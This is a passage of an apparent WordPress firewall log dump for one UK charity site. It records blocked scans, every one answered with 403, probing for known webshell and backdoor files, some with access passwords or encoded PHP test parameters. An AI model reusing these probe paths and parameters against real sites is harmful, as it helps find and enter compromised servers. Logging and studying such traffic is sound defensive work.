Safari\\/537.36\"}','Tk7vEwiVPb5od6F3KnQOBYm4',0,1674161998.9515,94,'','GET',403,0,700,0,1,'',0),('118.27.122.157',1981512349,'','https://equalitywalk.org.uk/xleetshell.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','gcyNwz98vYl5QLaWxPj7JVqR',0,1674161999.0896,112,'','GET',403,0,700,0,1,'',0),('118.27.122.157',1981512349,'','https://equalitywalk.org.uk/sh3llx.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/14.0.3 Mobile\\/15E148 Safari\\/604.1\"}','ysJBHUtAwvXIYL9SG1PouWjh',0,1674161999.0936,118,'','GET',403,0,700,0,1,'',0),('172.106.113.215',2892657111,'','https://equalitywalk.org.uk/xltavrat.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/xltavrat.php\"}','gx8ZuQdGlbpC6TeY3zBUIy2i',0,1674164459.3123,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','35pbZ2hj7AseBEDYNrQqkRUW',0,1674178388.4246,159,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','WuoNxvDq6pQU5IcZGz39nhKe',0,1674178397.1922,117,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','q087V6pIW3ojzwakASsCdxLH',0,1674178430.9392,101,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','OVMJtmr78XCIpFZLbv2K1YQ3',0,1674178449.8830,116,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','BazRUb4iZHd2sIDcV5M0kn8m',0,1674178476.5861,107,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9p412co8Rxs3SZCWFGJ0iaXB',0,1674178615.1675,114,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','k6hNAyTnILs987wbWj1B5oGR',0,1674178627.9430,100,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vtdLFN08qBApYSQhZOCabmWn',0,1674178660.5931,128,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Z12DpsqQhJy5wlIc4LPUziBv',0,1674178704.5586,127,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','OZAm1W2jPTfhkpReXVHoixMl',0,1674178723.1078,134,'','GET',403,0,700,0,1,'',0),('51.79.55.183',860829623,'','https://equalitywalk.org.uk/vim/patior/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/vim\\/patior\\/index.php\"}','MJBUahLZG1tcrE5yFRNxC4Al',0,1674178873.0999,124,'','GET',403,0,700,0,1,'',0),('51.79.55.183',860829623,'','https://equalitywalk.org.uk/vim/patior/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/vim\\/patior\\/index.php\"}','KCV2bl6ZMuQdE7knm85OvDGy',0,1674178876.8770,103,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://equalitywalk.org.uk/wp-admin/css/colors/blue/blue.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','E5CY4B82ZlX6bzfaGFUWv1de',0,1674184871.6307,230,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://equalitywalk.org.uk/wp/wp-admin/css/colors/blue/blue.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','eMVcJWtiXHNwO7RljIkASK0b',0,1674184872.5769,157,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://equalitywalk.org.uk/wordpress/wp-admin/css/colors/blue/blue.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','9rnqPTR4HiNsOxcVXdbfa1uJ',0,1674184873.6976,136,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://equalitywalk.org.uk/blog/wp-admin/css/colors/blue/blue.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','03ZpIl75droxuPJEgS9Mmaik',0,1674184874.7904,124,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://equalitywalk.org.uk/site/wp-admin/css/colors/blue/blue.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','pUxMHkd6R2KGPwWtFT4ESzL3',0,1674184875.4008,169,'','GET',403,0,700,0,1,'',0),('92.205.8.185',1556940985,'','https://equalitywalk.org.uk/wp-admin/js/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/js\\/index.php\"}','74YptCzlhoSgrMfUAmRbKJuy',0,1674187299.7445,4052,'','GET',403,0,700,0,1,'',0),('5.78.57.119',89012599,'','https://equalitywalk.org.uk/abruzi.php4','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','teDuXQKNYWomx5UnMCJh6AfP',0,1674189976.2798,138,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','NyTQJSdIZO3tGbe5pXUVEz87',0,1674191815.1966,247,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','p80o2ZnFfi3TVyYWSJDHqm46',0,1674191825.7295,134,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','q8vuNohYf0RBDXd2a9nTzx5U',0,1674191837.6054,112,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Wuqj8kZQd3T5FEvMfntbpBxw',0,1674191845.4651,152,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','m3u5V2hjDypIgEUY7K6OBWHb',0,1674191859.7758,131,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','CK1JUQmS2rl7wufZceqxpDNM',0,1674191937.6323,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','l4QD5ORs0CeizVca1qNonk8A',0,1674191942.9914,128,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6RcQIoeDqnfuP0OlWHFwarNE',0,1674191947.8194,119,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','4oG0lhsZSCnJKdVDgMHe2w38',0,1674191950.8361,100,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','eVYpwh52DATMNmLXkS8fvodt',0,1674191988.1172,148,'','GET',403,0,700,0,1,'',0),('195.30.85.130',3273545090,'','https://equalitywalk.org.uk/wp-admin/evidence-family.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/evidence-family.php\"}','ZJiAOGleWwtj08fYrQsHyKqp',0,1674198533.3303,201,'','GET',403,0,700,0,1,'',0),('40.117.83.110',678777710,'','https://www.equalitywalk.org.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','qdViyMJgB2xFE1rLQjKleOCf',0,1674201187.4251,196,'','POST',403,0,700,0,1,'',0),('40.117.83.110',678777710,'','https://www.equalitywalk.org.uk/ogzwnsnq.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','tIr4zUpGSq3Je2cEyYXiLM08',0,1674201187.7388,132,'','GET',403,0,700,0,1,'',0),('40.117.83.110',678777710,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','E7UIZCT5onjB49Sx1u0bYytV',0,1674201200.7730,446,'','GET',403,0,700,0,1,'',0),('40.117.83.110',678777710,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','fgFGRjDKVqypCPs6cmOSe0Mn',0,1674201201.4018,132,'','GET',403,0,700,0,1,'',0),('194.38.20.161',3257275553,'','https://equalitywalk.org.uk/joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','91Uu0fjcsYCbnPB6Gv2lHLxi',0,1674216885.1960,856,'','GET',403,0,700,0,1,'',0),('192.185.2.22',3233350166,'','https://equalitywalk.org.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/fw.php\"}','6zaPBWFS3w7sbt0prTGgKAkE',0,1674222605.3475,119,'','GET',403,0,700,0,1,'',0),('103.212.229.26',1742005530,'','https://equalitywalk.org.uk/wp-includes/js/tinymce/skins/lightgray/fonts/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-includes\\/js\\/tinymce\\/skins\\/lightgray\\/fonts\\/index.php\"}','Wie16QdStcH2UG5b9Dv7akPl',0,1674248320.0134,133,'','GET',403,0,700,0,1,'',0),('198.71.236.47',3326602287,'','https://equalitywalk.org.uk/wp-admin/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mMnBERyJ0ce7gr3XIkDaStxK',0,1674251619.4142,117,'','GET',403,0,700,0,1,'',0),('198.71.236.47',3326602287,'','https://equalitywalk.org.uk/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','4iOM7oGRZe9kcrAHbtx5Vp6X',0,1674251619.4175,124,'','GET',403,0,700,0,1,'',0),('94.198.53.161',1590048161,'','https://www.equalitywalk.org.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','FTsuZwYjB3HL18i6A9ESCGzk',0,1674257642.6120,130,'','GET',403,0,700,0,1,'',0),('192.185.83.247',3233371127,'','https://equalitywalk.org.uk/wp-admin/patior/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/patior\\/index.php\"}','3penom9RP7D0OzNLk2KQBbtq',0,1674270907.3544,328,'','GET',403,0,700,0,1,'',0),('142.93.104.22',2388486166,'','https://www.equalitywalk.org.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Xc3FQGSfRkD6Z2p1P4TAI8Hm',0,1674279810.8896,231,'','GET',403,0,700,0,1,'',0),('75.119.157.105',1266130281,'','https://www.equalitywalk.org.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','8QcgIaUfNRpkqBSLhKO25mt9',0,1674279810.9151,209,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','8Gw2PLyRDxU3ukQThH0tYa5d',0,1674292838.7043,139,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','SeF3j8fKgPxOlkDZmVrUvq4n',0,1674293059.6661,173,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-includes/fonts/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','mqj9v20zPRO3olN1uKniyd5g',0,1674293060.6592,162,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','HBvdi6WczaDnRlutYbZOS574',0,1674293069.2503,145,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"python-requests\\/2.28.1\"}','xY3tN1R8Tn2BZEijGDbFWupl',0,1674293071.7214,137,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/lufix.php','','{\"1\":\"python-requests\\/2.28.1\"}','QgCJ2zchOv8qKeDMwt1xkbXL',0,1674293072.6702,107,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/upl.php','','{\"1\":\"python-requests\\/2.28.1\"}','XinbSLNkrV0Gv953qWjzYBeH',0,1674293073.5522,255,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/upl.php','','{\"1\":\"python-requests\\/2.28.1\"}','vpVqEwxWHherL83IRU1PC2Ac',0,1674293074.2884,118,'','POST',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','BCkwf2mUIn9rHApFONW0Yab8',0,1674295743.9530,151,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','GrNqcxuFvaeik0mhMO9RbSTZ',0,1674295744.3479,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','lU0vu8w7WjymBMrcJ46t3ZDn',0,1674295744.6577,98,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','u0ociaQrNWEkJnA47PK2OFfv',0,1674295746.9683,480,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ug1hd0fCWJMUlZQcS62NBmYK',0,1674295747.6608,119,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','IJyl6Zspk3x2nDPYvS0uFMR1',0,1674295748.2034,134,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pBGQ2AXClo1qsItrjOvRKmwZ',0,1674295750.9479,107,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','W48DozZjMRB7dHO5KtQn9Tbh',0,1674295751.2548,89,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','YhRg1K5rTtSVcIMLzo2bma0k',0,1674295751.5585,121,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','2bHtxcOW73pedaZzsIlmT4gU',0,1674295753.9710,90,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','VjRQYnxyD0Thb3aIXLAcCu9o',0,1674295754.2801,95,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','n4q7EmGQNYy9jFBvz2USPKTD',0,1674295754.6252,110,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8Jxif4Qp2jhcobsEP9BRlvgw',0,1674295757.2502,109,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile 